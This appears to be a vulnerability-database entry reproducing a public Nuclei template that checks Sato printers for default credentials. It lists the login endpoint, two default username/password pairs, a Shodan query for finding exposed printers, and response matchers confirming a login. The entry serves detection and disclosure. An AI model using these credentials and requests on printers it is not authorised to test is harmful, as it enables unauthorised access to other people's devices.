sato-default-login: Sato - Default Login

Date: 2025-08-01 | Affected software: sato | PoC: public

Vulnerability description

A Sato printer was discovered using default credentials.

PoC code [public]

id: sato-default-login

info:
  name: Sato - Default Login
  author: y0no
  severity: high
  description: |
    Sato using default credentials was discovered.
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Sato"
  tags: sato,default-login,printer,vuln

http:
  - raw:
      - |
        POST /WebConfig/lua/auth.lua HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{BaseURL}}

        group={{username}}&pw={{password}}

    attack: pitchfork

    payloads:
      username:
        - 'settings'
        - 'service'
      password:
        - '0310'
        - '6677'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"r":0'
          - 'groups":["user'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 490a004630440220122c0e004f2ef4ddebe9bcdcd79dbf1157268eb2075a0d8bf845b07c07ea94d8022051ac1c00b7c1b14e01af8dc8eef7f8b9e9acb052e20191438f6e1f0cd6f86ecd:922c64590222798bb761d5b6d8e72950
